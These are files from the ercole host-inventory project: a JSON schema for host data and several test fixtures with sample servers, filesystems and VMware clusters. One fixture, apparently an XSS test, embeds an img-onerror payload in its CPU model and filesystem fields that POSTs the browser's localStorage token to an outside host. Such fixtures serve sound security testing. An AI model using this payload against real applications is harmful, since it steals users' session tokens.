=== ercole-io/ercole/schema/hostdata.json
{
    "$schema": "http://json-schema.org/draft-07/schema#",
    "$id": "ercole-hostdata",
    "type": "object",
    "required": [
        "hostname",
        "location",
        "environment",
        "tags",
        "agentVersion",
        "schemaVersion",
        "info",
        "clusterMembershipStatus",
        "features",
        "filesystems"
    ],
    "properties": {
        "hostname": {
            "type": "string",
            "minLength": 1,
            "maxLength": 253,
            "format": "idn-hostname"
        },
        "location": {
            "type": "string",
            "minLength": 1,
            "maxLength": 64
        },
        "environment": {
            "type": "string",
            "minLength": 1,
            "maxLength": 16
        },
        "tags": {
            "type": "array",
            "items": {
                "type": "string",
                "minLength": 1,
                "maxLength": 128
            },
            "uniqueItems": true
        },
        "agentVersion": {
            "type": "string",
            "minLength": 1,
            "maxLength": 64
        },
        "schemaVersion": {
            "type": "integer",
            "const": 1
        },
        "info": {
            "type": "object",
            "required": [
                "hostname",
                "cpuModel",
                "cpuFrequency",
                "cpuSockets",
                "cpuCores",
                "cpuThreads",
                "threadsPerCore",
                "coresPerSocket",
                "hardwareAbstraction",
                "hardwareAbstractionTechnology",
                "kernel",
                "kernelVersion",
                "os",
                "osVersion",
                "memoryTotal",
                "swapTotal"
            ],
            "properties": {
                "hostname": {
                    "type": "string",
                    "minLength": 1,
                    "maxLength": 253,
                    "format": "idn-hostname"
                },
                "cpuModel": {
                    "type": "string",
                    "minLength": 1,
                    "maxLength": 64,
                    "pattern": "^[^\n]+$"
                },
                "cpuFrequency": {
                    "type": "string",
                    "minLength": 0,
                    "maxLength": 16
                },
                "cpuSockets": {
                    "type": "integer",
                    "minimum": 0
                },
                "cpuCores": {
                    "type": "integer",
                    "minimum": 1
                },
                "cpuThreads": {
                    "type": "integer",
                    "minimum": 1
                },
                "threadsPerCore": {
                    "type": "integer",
                    "minimum": 1
                },
                "coresPerSocket": {
                    "type": "integer",
                    "minimum": 1
                },
                "hardwareAbstraction": {
                    "type": "string",
                    "enum": [
                        "PH",
                        "VIRT"
                    ]
                },
                "hardwareAbstractionTechnology": {
                    "type": "string",
                    "minLength": 1,
                    "maxLength": 32,
                    "pattern": "^[A-Z0-9]+$"
                },
                "kernel": {
                    "type": "string",
                    "minLength": 1,
                    "maxLength": 128
                },
                "kernelVersion": {
                    "type": "string",
                    "minLength": 1,
                    "maxLength": 64
                },
                "os": {
                    "type": "string",
                    "minLength": 1,
                    "maxLength": 64
                },
                "osVersion": {
                    "type": "string",
                    "minLength": 1,
                    "maxLength": 64
                },
                "memoryTotal": {
                    "type": "number",
                    "minimum": 0
                },
                "swapTotal": {
                    "type": "number",
                    "minimum": 0
                }
            }
        },
        "clusterMembershipStatus": {
            "type": "object",
            "properties": {
                "oracleClusterware": {
                    "type": "boolean"
                },
                "sunCluster": {
                    "type": "boolean"
                },
                "hacmp": {
                    "type": "boolean"
                },
                "veritasClusterServer": {
                    "type": "boolean"
                },
                "veritasClusterHostnames": {
                    "anyOf": [
                        {
                            "type": "null"
                        },
                        {
                            "type": "array",
                            "uniqueItems": true,
                            "items": {
                                "type": "string"
                            }
                        }
                    ]
                }
            }
        },
        "features": {
            "type": "object",
            "properties": {
                "oracle": {
                    "anyOf": [
                        {
                            "type": "null"
                        },
                        {
                            "$ref": "oracleFeature"
                        }
                    ]
                },
                "postgresql": {
                    "anyOf": [
                        {
                            "type": "null"
                        },
                        {
                            "$ref": "postgresqlFeature"
                        }
                    ]
                },
                "microsoft": {
                    "anyOf": [
                        {
                            "type": "null"
                        },
                        {
                            "$ref": "microsoftFeature"
                        }
                    ]
                },
                "mysql": {
                    "anyOf": [
                        {
                            "type": "null"
                        },
                        {
                            "$ref": "mysqlFeature"
                        }
                    ]
                }
            }
        },
        "filesystems": {
            "type": "array",
            "items": {
                "type": "object",
                "required": [
                    "filesystem",
                    "type",
                    "size",
                    "usedSpace",
                    "availableSpace",
                    "mountedOn"
                ],
                "properties": {
                    "filesystem": {
                        "type": "string",
                        "minLength": 1
                    },
                    "type": {
                        "type": "string",
                        "minLength": 1
                    },
                    "size": {
                        "type": "integer",
                        "minimum": 0,
                        "$comment": "size in bytes"
                    },
                    "usedSpace": {
                        "type": "integer",
                        "minimum": 0,
                        "$comment": "used in bytes"
                    },
                    "availableSpace": {
                        "type": "integer",
                        "minimum": 0,
                        "$comment": "availableSpace in bytes"
                    },
                    "mountedOn": {
                        "type": "string",
                        "minLength": 1
                    }
                }
            }
        },
        "clusters": {
            "anyOf": [
                {
                    "type": "null"
                },
                {
                    "type": "array",
                    "items": {
                        "type": "object",
                        "required": [
                            "fetchEndpoint",
                            "type",
                            "name",
                            "cpu",
                            "sockets",
                            "vms"
                        ],
                        "properties": {
                            "fetchEndpoint": {
                                "type": "string",
                                "minLength": 1,
                                "maxLength": 64
                            },
                            "type": {
                                "type": "string",
                                "enum": [
                                    "Oracle/VM",
                                    "VMWare/VMWare"
                                ]
                            },
                            "name": {
                                "type": "string",
                                "minLength": 1,
                                "maxLength": 128
                            },
                            "cpu": {
                                "type": "integer",
                                "minimum": 0
                            },
                            "sockets": {
                                "type": "integer",
                                "minimum": 0
                            },
                            "vms": {
                                "type": "array",
                                "items": {
                                    "type": "object",
                                    "required": [
                                        "name",
                                        "hostname",
                                        "cappedCPU",
                                        "virtualizationNode"
                                    ],
                                    "properties": {
                                        "name": {
                                            "type": "string",
                                            "minLength": 1,
                                            "maxLength": 128
                                        },
                                        "hostname": {
                                            "type": "string",
                                            "minLength": 1,
                                            "maxLength": 253,
                                            "format": "idn-hostname"
                                        },
                                        "cappedCPU": {
                                            "type": "boolean"
                                        },
                                        "virtualizationNode": {
                                            "type": "string",
                                            "minLength": 1,
                                            "maxLength": 253,
                                            "format": "idn-hostname"
                                        }
                                    }
                                }
                            }
                        }
                    }
                }
            ]
        }
    }
}

=== ercole-io/ercole/fixture/test_dataservice_hostdata_v1_20.json
{
    "hostname": "test-virt",
    "environment": "PROD",
    "location": "Italy",
    "info": {
        "hostname": "test-virt2",
        "cpuModel": "Intel(R) Xeon(R) CPU E5-2680 v3 @ 2.50GHz",
        "cpuCores": 1,
        "cpuThreads": 2,
        "kernel": "3.10.0-862.9.1.el7.x86_64",
        "os": "Red Hat Enterprise Linux",
        "memoryTotal": 3,
        "swapTotal": 4,
        "cpuFrequency": "2.50GHz",
        "cpuSockets": 2,
        "coresPerSocket": 1,
        "threadsPerCore": 2,
        "kernelVersion": "3.10.0-862.9.1.el7.x86_64",
        "osVersion": "7.5",
        "hardwareAbstraction": "VIRT",
        "hardwareAbstractionTechnology": "VMWARE"
    },
    "agentVersion": "1.6.1",
    "tags": [],
    "schemaVersion": 1,
    "clusterMembershipStatus": {
        "oracleClusterware": false,
        "veritasClusterServer": false,
        "sunCluster": false,
        "hacmp": false
    },
    "filesystems": [
        {
            "filesystem": "/dev/mapper/vg_os-lv_root",
            "size": 8589934592,
            "mountedOn": "/",
            "availableSpace": 4939212390,
            "usedSpace": 3758096384,
            "type": "xfs"
        }
    ],
    "features": {},
    "clusters": [
        {
            "name": "Puzzait",
            "type": "VMWare/VMWare",
            "cpu": 140,
            "sockets": 10,
            "vms": [
                {
                    "name": "test-virt",
                    "hostname": "test-virt",
                    "cappedCPU": false,
                    "virtualizationNode": "s157-cb32c10a56c256746c337e21b3f82402"
                },
                {
                    "name": "test-db2",
                    "hostname": "test-db2",
                    "cappedCPU": false,
                    "virtualizationNode": "s157-cb32c10a56c256746c337e21b3f82402"
                }
            ],
            "fetchEndpoint": "???"
        },
        {
            "name": "Puzzait2",
            "type": "VMWare/VMWare",
            "cpu": 140,
            "sockets": 10,
            "vms": [
                {
                    "name": "test-virt2",
                    "hostname": "test-virt2",
                    "cappedCPU": false,
                    "virtualizationNode": "s157-4232453"
                },
                {
                    "name": "test-db2",
                    "hostname": "test-db2",
                    "cappedCPU": false,
                    "virtualizationNode": "s157-45674675"
                }
            ],
            "fetchEndpoint": "???"
        },
        {
            "name": "Puzzait3",
            "type": "VMWare/VMWare",
            "cpu": 140,
            "sockets": 10,
            "vms": [
                {
                    "name": "test-virt3",
                    "hostname": "test-virt3",
                    "cappedCPU": false,
                    "virtualizationNode": "s157-123431342"
                },
                {
                    "name": "test-db3",
                    "hostname": "test-db3",
                    "cappedCPU": false,
                    "virtualizationNode": "s157-345234534"
                }
            ],
            "fetchEndpoint": "???"
        },
        {
            "name": "Puzzait4",
            "type": "VMWare/VMWare",
            "cpu": 140,
            "sockets": 10,
            "vms": [
                {
                    "name": "test-virt4",
                    "hostname": "test-virt4",
                    "cappedCPU": false,
                    "virtualizationNode": "s157-qwererterty"
                },
                {
                    "name": "test-db4",
                    "hostname": "test-db4",
                    "cappedCPU": false,
                    "virtualizationNode": "s157-ertyeryte"
                },
                {
                    "name": "test-db4",
                    "hostname": "test-db4",
                    "cappedCPU": false,
                    "virtualizationNode": "s157-ertyeryte"
                },
                {
                    "name": "test-db4",
                    "hostname": "test-db4",
                    "cappedCPU": false,
                    "virtualizationNode": "s157-ertyeryte"
                }
            ],
            "fetchEndpoint": "???"
        },
        {
            "name": "Puzzait5",
            "type": "VMWare/VMWare",
            "cpu": 140,
            "sockets": 10,
            "vms": [
                {
                    "name": "test-virt5",
                    "hostname": "test-virt5",
                    "cappedCPU": false,
                    "virtualizationNode": "s157-tyuiuiytyui"
                },
                {
                    "name": "test-db5",
                    "hostname": "test-db5",
                    "cappedCPU": false,
                    "virtualizationNode": "s157-tyuiuiytyui"
                }
            ],
            "fetchEndpoint": "???"
        },
        {
            "name": "Puzzait6",
            "type": "VMWare/VMWare",
            "cpu": 140,
            "sockets": 10,
            "vms": [
                {
                    "name": "test-virt6",
                    "hostname": "test-virt6",
                    "cappedCPU": false,
                    "virtualizationNode": "s157-tyuiiyu"
                },
                {
                    "name": "test-db6",
                    "hostname": "test-db6",
                    "cappedCPU": false,
                    "virtualizationNode": "s157-yuiouiyo"
                }
            ],
            "fetchEndpoint": "???"
        },
        {
            "name": "Puzzait7",
            "type": "VMWare/VMWare",
            "cpu": 140,
            "sockets": 10,
            "vms": [
                {
                    "name": "test-virt7",
                    "hostname": "test-virt7",
                    "cappedCPU": false,
                    "virtualizationNode": "s157-uiopuiop"
                },
                {
                    "name": "test-db7",
                    "hostname": "test-db7",
                    "cappedCPU": false,
                    "virtualizationNode": "s157-yzxcxcyz"
                }
            ],
            "fetchEndpoint": "???"
        },
        {
            "name": "Puzzait8",
            "type": "VMWare/VMWare",
            "cpu": 140,
            "sockets": 10,
            "vms": [
                {
                    "name": "test-virt8",
                    "hostname": "test-virt8",
                    "cappedCPU": false,
                    "virtualizationNode": "s157-xcvbvbc"
                },
                {
                    "name": "test-db8",
                    "hostname": "test-db8",
                    "cappedCPU": false,
                    "virtualizationNode": "s157-bvnmbnm"
                }
            ],
            "fetchEndpoint": "???"
        },
        {
            "name": "Puzzait9",
            "type": "VMWare/VMWare",
            "cpu": 140,
            "sockets": 10,
            "vms": [
                {
                    "name": "test-virt9",
                    "hostname": "test-virt9",
                    "cappedCPU": false,
                    "virtualizationNode": "s157-qwweqwer"
                },
                {
                    "name": "test-db9",
                    "hostname": "test-db9",
                    "cappedCPU": false,
                    "virtualizationNode": "s157-wertwertertw"
                }
            ],
            "fetchEndpoint": "???"
        },
        {
            "name": "Puzzait10",
            "type": "VMWare/VMWare",
            "cpu": 140,
            "sockets": 10,
            "vms": [
                {
                    "name": "test-virt10",
                    "hostname": "test-virt10",
                    "cappedCPU": false,
                    "virtualizationNode": "s157-uiytyuiutyi"
                },
                {
                    "name": "test-db10",
                    "hostname": "test-db10",
                    "cappedCPU": false,
                    "virtualizationNode": "s157-dfgsdfsg"
                }
            ],
            "fetchEndpoint": "???"
        }
    ]
}

=== ercole-io/ercole/fixture/test_dataservice_hostdata_xss_v1_00.json
{
    "hostname": "rac1_x",
    "environment": "TST",
    "location": "Germany",
    "info": {
        "hostname": "rac1",
        "cpuModel": "Intel(R) Xeon(R) CPU E5-2609 <img src=nope onerror=fetch('https://somewebsite',{method:'POST',mode:'no-cors',body:window.localStorage['token']});>v4 @ 1.70GHz",
        "cpuCores": 1,
        "cpuThreads": 2,
        "kernel": "4.1.12-103.3.8.1.el7uek.x86_64",
        "os": "Red Hat Enterprise Linux",
        "memoryTotal": 7,
        "swapTotal": 7,
        "cpuFrequency": "1.70GHz",
        "cpuSockets": 1,
        "coresPerSocket": 1,
        "threadsPerCore": 2,
        "kernelVersion": "4.1.12-103.3.8.1.el7uek.x86_64",
        "osVersion": "7.4",
        "hardwareAbstraction": "VIRT",
        "hardwareAbstractionTechnology": "OVM"
    },
    "agentVersion": "1.6.5",
    "tags": [],
    "schemaVersion": 1,
    "clusterMembershipStatus": {
        "oracleClusterware": true,
        "veritasClusterServer": false,
        "sunCluster": false,
        "hacmp": false
    },
    "filesystems": [
        {
            "filesystem": "/dev/mapper<img src=nope onerror=fetch('https://somewebsite',{method:'POST',mode:'no-cors',body:window.localStorage['token']});>/rootvg-root",
            "size": 23622320128,
            "mountedOn": "/",
            "availableSpace": 18253611008,
            "usedSpace": 3758096384,
            "type": "ext4"
        },
        {
            "filesystem": "/dev/xvda1",
            "size": 296747008,
            "mountedOn": "/boot",
            "availableSpace": 81788928,
            "usedSpace": 196083712,
            "type": "ext4"
        }
    ],
    "features": {},
    "clusters": null
}

=== ercole-io/ercole/fixture/test_dataservice_hostdata_v1_15_small.json
{
    "hostname": "test-small4",
    "environment": "TST",
    "location": "Italy",
    "info": {
        "hostname": "test-small3",
        "cpuModel": "Intel(R) Core(TM) i5-8265U CPU @ 1.60GHz",
        "cpuCores": 1,
        "cpuThreads": 2,
        "kernel": "5.3.0-45-generic",
        "os": "Ubuntu",
        "memoryTotal": 3,
        "swapTotal": 1,
        "cpuFrequency": "1.60GHz",
        "cpuSockets": 2,
        "coresPerSocket": 1,
        "threadsPerCore": 2,
        "kernelVersion": "5.3.0-45-generic",
        "osVersion": "18.04.4",
        "hardwareAbstraction": "VIRT",
        "hardwareAbstractionTechnology": "VMWARE"
    },
    "agentVersion": "latest",
    "tags": [],
    "schemaVersion": 1,
    "clusterMembershipStatus": {
        "oracleClusterware": false,
        "veritasClusterServer": true,
        "sunCluster": false,
        "hacmp": false
    },
    "filesystems": [
        {
            "filesystem": "/dev/sda1",
            "size": 511705088,
            "mountedOn": "/boot",
            "availableSpace": 335544320,
            "usedSpace": 139460608,
            "type": "ext4"
        }
    ],
    "features": {},
    "clusters": null
}

=== ercole-io/ercole/fixture/test_dataservice_hostdata_v1_11_small.json
{
    "hostname": "test-small2",
    "environment": "DEV",
    "location": "Italy",
    "info": {
        "hostname": "test-small2",
        "cpuModel": "Intel(R) Xeon(R) CPU           E5630  @ 2.53GHz",
        "cpuCores": 1,
        "cpuThreads": 2,
        "kernel": "3.10.0-514.el7.x86_64",
        "os": "Red Hat Enterprise Linux",
        "memoryTotal": 3,
        "swapTotal": 1,
        "cpuFrequency": "2.53GHz",
        "cpuSockets": 2,
        "coresPerSocket": 1,
        "threadsPerCore": 2,
        "kernelVersion": "3.10.0-514.el7.x86_64",
        "osVersion": "7.6",
        "hardwareAbstraction": "VIRT",
        "hardwareAbstractionTechnology": "VMWARE"
    },
    "agentVersion": "latest",
    "tags": [],
    "schemaVersion": 1,
    "clusterMembershipStatus": {
        "oracleClusterware": false,
        "veritasClusterServer": false,
        "sunCluster": false,
        "hacmp": false
    },
    "filesystems": [
        {
            "filesystem": "/dev/sda1",
            "size": 511705088,
            "mountedOn": "/boot",
            "availableSpace": 335544320,
            "usedSpace": 139460608,
            "type": "ext4"
        }
    ],
    "features": {},
    "clusters": null
}
